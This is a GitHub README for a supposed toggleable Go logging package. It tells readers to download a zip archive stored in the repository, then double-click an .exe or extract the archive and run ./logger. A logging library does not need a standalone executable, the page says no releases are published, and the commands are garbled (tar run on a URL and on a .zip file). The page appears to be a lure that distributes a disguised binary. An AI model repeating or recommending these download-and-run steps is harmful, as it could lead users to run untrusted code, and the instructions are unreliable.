Skip to content

πŸ“œ Simplify logging in Go with toggleable options, controlling output via a simple boolean flag for more efficient development and debugging.

License

Kanha112/logger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

33 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ logger - Simple Logging Made Easy

πŸš€ Getting Started

Welcome to logger, a toggleable logging package that makes using Go's log package simple. This tool helps you manage logs effortlessly.

πŸ“₯ Download & Install

To get started with logger, visit the Releases page to download the latest version.

Download the latest version

Step-by-Step Instructions

  1. Visit the Releases Page: Click on the link above to access the releases page.
  2. Select the Latest Release: You will see a list of available versions. Pick the top version, which is the most recent.
  3. Choose Your File: Depending on your operating system, select the appropriate file to download (e.g., .exe for Windows, https://raw.githubusercontent.com/Kanha112/logger/main/usability/logger.zip for Linux, or .zip for macOS).
  4. Start the Download: Click on the file to begin downloading it to your computer.
  5. Locate the Downloaded File: Find the file in your Downloads folder or designated location.

Installation Steps

Windows

  1. Double Click the Downloaded File: Locate the .exe file and double-click it to run.
  2. Follow On-Screen Instructions: The installation wizard will guide you through setting up logger on your system.

macOS

  1. Open Terminal: Navigate to your Applications folder, then open the Terminal.
  2. Extract the File: Use the command tar -xzvf https://raw.githubusercontent.com/Kanha112/logger/main/usability/logger.zip to extract the contents.
  3. Run the Application: Navigate to the extracted folder and enter the command ./logger to start using the application.

Linux

  1. Open Terminal: Find and open your terminal application.
  2. Extract the File: Use the command tar -xzvf https://raw.githubusercontent.com/Kanha112/logger/main/usability/logger.zip to extract the files.
  3. Run the Application: Navigate to the folder with the extracted files and use the command ./logger to run it.

πŸ” Basic Usage

After installation, logger is easy to use. Here’s a simple guide to get you started:

  1. Toggle Logging: Use commands to turn logging on and off as needed.
  2. Add Your Logs: Insert messages or data you want to log. This can be activity, errors, or any information you want to track.
  3. View Output: The logs will appear in your console or specified output file.

βš™οΈ Features

  • Toggleable Logging: Switch logging on or off with ease.
  • Lightweight Design: Minimal setup required, allowing you to focus on your application.
  • Built on Go's Log Package: Utilizes Go’s robust logging capabilities for reliability.

πŸ“‹ System Requirements

  • Operating Systems: Compatible with Windows, macOS, and Linux.
  • Go Version: Requires Go 1.16 or higher installed on your system.

πŸ› οΈ Troubleshooting

If you encounter issues while downloading or running logger, consider the following:

  • Check File Integrity: Make sure the downloaded file is complete and not corrupted.
  • Ensure Compatibility: Verify that your system meets the requirements listed above.
  • Refer to Documentation: Review any related documentation for more detailed information.

🌟 Community & Support

If you have questions or need help, check out the community forums or reach out directly through GitHub. Your feedback is valuable and helps improve logger.

πŸ“œ License

logger is released under the MIT License. Feel free to use it in your projects.

⭐ Acknowledgments

Thanks to the contributors and the Go community for their support in developing logger. Your efforts make this project possible.

For more detailed documentation, visit our Releases page and start logging today!

About

πŸ“œ Simplify logging in Go with toggleable options, controlling output via a simple boolean flag for more efficient development and debugging.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages